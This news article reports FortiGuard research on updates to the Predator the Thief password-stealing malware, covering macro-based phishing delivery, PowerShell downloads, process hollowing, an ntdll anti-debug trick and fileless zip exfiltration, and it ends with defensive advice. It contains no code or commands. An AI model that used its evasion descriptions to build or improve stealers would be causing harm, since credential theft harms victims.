In July 2019, FortiGuard Labs discovered that hackers had launched a very potent malware that is capable of stealing usernames and passwords through a phishing campaign. Hackers launched Predator the Thief in different phishing forms such as fake PDFs, fake documents, fake Zipped files and WinRAR.
Researchers discovered that the malware was largely sold in game cheating forums, dark web, and hacking forums. It has been designed to replace cryptocurrency wallet address in the buffer, steal passwords, take photos using the device webcam and many more according to the research.
Recently, the password-stealing malware has been updated from its previous version. Predator the Thief was earlier updated to 3.0.8 version before undergoing another update to 3.3.3 in the Christmas eve. Fortiguard Labs has discovered that the malware has undergone another update to 3.3.4 with a minor difference from the previous versions.
Predator the Thief is updated to a more stealthier and more complicated compared to its previous versions. This is a serious course for concern and an indication that cybercriminals are constantly upgrading the potency of their tools to attack facilities with a strong defender.
Predator the Thief Analysis
Image Source: www.fumic0.com
According to Fortiguard, Predator the Thief is launched in multiple phishing documents and appears as genuine invoices. Hackers behind the attack convince the targets to open the malicious attachment contained in the message, and when opened, an AutoOpen macro launches malware VBA script on the host.
After this operation, three files are downloaded through PowerShell. It then executes another order by using legitimate Autolt3.exe to open decoded AutoIt script. Other instructions are executed before Predator the Thief is loaded into a specific hollow process as explained by the FortiGuard. It was discovered that the developers use Telegram to promote their business, and they upgrade the panel and steal almost every month.
From the previous updates, the stealer side did not change much in the new update, but a number of features were added including the anti-debug trick. This new version copies portion of the ntdll.dll into a specified memory, then hook the portion with the shellcode and call one of the relevant functions for anti-debug purposes.
This has been designed to prevent the NtQueryinformationProcess to stand a chance of being not detected. According to the report, the feature also checks the crc32 checksum of the specified memory to avoid any changes.
In addition, a more complicated assembly code has been added to the new version. Most of the junk codes in the main routine has been deleted in the new update. Interestingly, the assembly code is way shorter compared to the previous versions but very complicated.
In addition, the stolen passwords and other credentials are delivered as Zip files. The Predator the Thief malware has been designed to allocate memory space for the entire zip file structure. After that, the zip file is added directly from the memory to the request data. The files are not created in the file system as explained in the report.
The updated version of Predator the Thief has made a way to overcome the legitimate AutoIt software to execute the payload. Configurations are detailed and complex, anti-analysis features are employed, as the whole program flow has undergone a massive change.
It is more difficult for analysts to assess complete damage to the victim’s system as it gathers information in a file-less way and deletes itself right after delivering the information to the instructed center. It also executes more modules and makes effort to second stage malware in various ways according to the FortiGuard research team.
Predator the Thief is currently on sale on the dark web and other hacking forums, and as expected, hackers will surely purchase it and use it in their phishing campaigns. The only way to stay safe is to follow the basic steps of avoiding malware attacks which mostly start from malicious attachments.
Image Source: www.broadanalysis.com
It is important for individuals and corporate bodies to update their antivirus software to the latest release, avoid clicking on suspicious links in emails, do not visit unsecured websites and have a backup of your sensitive files. Predator the Thief and other malware are updated with time to abuse your system defender. This calls the need to update your cybersecurity tools to match the attack of this malware.
It is worth noting that hackers mostly target the weakest link in a firm to stand a chance of having their malicious attachments opened. This is mostly the employee of a firm, and this calls for the need to run staff through the basic cybersecurity procedures.
Disclaimer: Darkweblink.com does not promote or endorse claims that have been made by any parties in this article. The information provided here is for the general purpose only and unintended to promote or support purchasing and/or selling of any products and services or serve as a recommendation in the involvement of doing so. Neither Darkweblink.com nor any member is responsible directly or indirectly for any loss or damage caused or alleged to be caused by or in relation to the reliance on or usage of any content, goods or services mentioned in this article.